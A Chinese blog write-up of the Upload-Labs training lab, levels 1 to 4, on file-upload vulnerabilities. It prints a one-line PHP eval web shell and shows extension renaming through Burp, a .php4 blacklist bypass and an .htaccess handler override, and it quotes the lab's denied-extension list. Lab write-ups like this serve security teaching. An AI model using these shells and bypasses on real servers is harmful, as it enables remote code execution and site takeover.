Upload-Labs靶场1-4

最新推荐文章于 2022-05-22 19:23:48 发布
最新推荐文章于 2022-05-22 19:23:48 发布
阅读量2k 收藏
点赞数
分类专栏: 网络安全 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wwang135/article/details/124246276
版权

用的buu的靶场

Pass-01

查看源码发现进行了限制

 

一句话木马:<?php @eval($_POST['key']);?>

用bp将yjhmm.jpg修改为yjhmm.php然后放包过去

上传地址:http://ca713556-ace3-46a0-be37-2972e851bfa3.node4.buuoj.cn:81/upload/yjhmm.php

然后用蚁剑连接

Pass-02

查看源码对文件类型进行了限制

这里和Pass-01一样将jpg文件的后缀名改成php

Pass-03

查看源码发现是黑名单绕过

将jpg文件的后缀名改成php4

Pass-04

源码进行了限制:

$deny_ext = array(".php",".php5",".php4",".php3",".php2","php1",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2","pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf")

<FileMatch"yjhmm.jpg">
SetHandler application/x-httpd-php

创建一个.htaccess的文件

 

用蚁剑连接成功了

 

 

 

 

 

 

 

 

 

wwang135
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
upload-labs靶场
qq_49518993的博客
05-29 477
pass1 前端js校验,因为是前端验证所以我们可以选择在前端修改代码checkFile()函数,把他删除 然后链接中国菜刀,上传成功 pass2
upload-labs靶场详解
最新发布
lizhiiiii的博客
04-17 972
使用小皮集成环境来完成这个靶场 将文件放到WWW目录下就可以进行访问。
upload-labs 文件上传靶场
weixin_45715461的博客
05-22 279
upload-labs 文件上传靶场
WEB渗透学习-upload-labs靶场
04-20
**WEB渗透学习-upload-labs靶场详解** 在网络安全领域,特别是Web渗透测试中,了解和掌握文件上传漏洞是至关重要的技能。"upload-labs"靶场是一个专为学习和实践文件上传漏洞设计的平台,它提供了21个关卡,从基础...
安装upload-labs
10-22
1. 下载靶场文件:首先,您需要下载upload-labs靶场文件,可以从官方网站或其他可靠的渠道下载。 2. 解压到WWW目录下:将下载的靶场文件解压到WWW目录下,请注意不要嵌套文件夹,否则可能会导致安装失败。 3. 启动...
upload-labs靶场通关指南
07-02
Upload-labs靶场通关指南 Upload-labs靶场是一款文件上传漏洞靶场,旨在帮助安全研究员和渗透测试人员练习文件上传漏洞的检测和利用。本指南提供了 Upload-labs靶场的通关指南,涵盖了从基础的文件上传漏洞到高级...
上传文件漏洞靶场upload-labs
09-27
【上传文件漏洞靶场upload-labs】是一个专为网络安全爱好者和初学者设计的实践平台,主要目的是帮助用户深入了解和练习上传文件漏洞。在Web应用程序中,上传功能常常因为设计不当而成为攻击者利用的安全隐患。这个...
upload-labs-master.zip
06-22
【标题】"upload-labs-master.zip" 是一个用于学习和实践文件上传漏洞的靶场项目。这个压缩包包含了 "upload-labs-master" 目录的多次副本,这可能表示靶场设计的不同阶段或者不同的练习环境。 【描述】描述中的 ...
upload-labs-master【文件上传靶场
04-05
最新版文件上传靶场
upload-labs 靶场练习
Knsec
04-21 3471
靶场简介 个人博客时光机 upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共20关,每一关都包含着不同上传方式。 项目地址:https://github.com/c0ny1/upload-labs 本writeup所使用环境为作者所提供的 windows环境一键启动环境。 靶场环境 漏洞简介 文件上传漏洞是由于对上传的文件没有进行合理严格的过滤,导致攻击者上传的文件被服务端解析,导致恶意文件中所包含的恶
靶场upload-labs1-10
ad12456的博客
04-18 1611
文件上传练习
upload-labs靶场实践
m0_51589948的博客
08-08 147
upload-labs Pass-01 Pass-02 Pass-03 Pass-04 Pass-05 Pass-06 Pass-07 Pass-08 Pass-09 Pass-10 Pass-11 Pass-12 Pass-13 Pass-14 Pass-15 Pass-16 Pass-17 Pass-18 Pass-19 Pass-20 Pass-21 Pass-01 打开靶场,获取源码,发现提交表单处存在js前端验证,在底下的源代码处发现上传文件类型的白名单只有`.jpg .png .gif.
打靶归来 - 详解upload-labs靶场(下)
qq_52643498的博客
09-22 1834
一、环境准备 ① - 靶场的搭建 下载地址:upload-labs upload-labs靶场曾有过一次更新,更新新添加了一道Pass-05,有一些以前的教程的题号与这篇教程不符合,请各位自行分辨 本篇作者所用到的PHP版本为5.4.45,只有在做部分题目时需要修改 注意:更改配置之后记得重启服务器 ② - 准备webshell 测试用webshell # shell.php → 测试所用的phpinfo <?php phpinfo(); ?> 图片马的制作 准备工作:准备好.
打靶归来 - 详解upload-labs靶场(上)
qq_52643498的博客
09-15 2422
一、靶场的搭建 ① - 靶场环境的搭建 下载地址:upload-labs upload-labs靶场曾有过一次更新,更新新添加了一道Pass-05,有一些以前的教程的题号与这篇教程不符合,请各位自行分辨 作者所用到的PHP版本为 ...
upload-labs靶场搭建教程
08-19
你可以按照以下步骤来搭建upload-labs靶场: 1. 首先,你可以使用以下命令将upload-labs镜像拉取到本地仓库: docker pull cuer/upload-labs [1] 2. 接下来,你可以在镜像仓库中搜索upload-labs镜像,使用以下命令: docker search upload-labs [2] 3. 除了使用Docker镜像,你还可以在GitHub上找到upload-labs靶场的源代码和相关资源。你可以访问以下链接获取更多信息: GitHub链接: https://github.com/Tj1ngwe1/upload-labs [3] 通过上述步骤,你可以拉取upload-labs镜像到本地仓库,并且在GitHub上找到相关的源代码和资源来搭建upload-labs靶场。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [upload-labs靶场的安装搭建](https://blog.csdn.net/qq_51331767/article/details/129196926)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值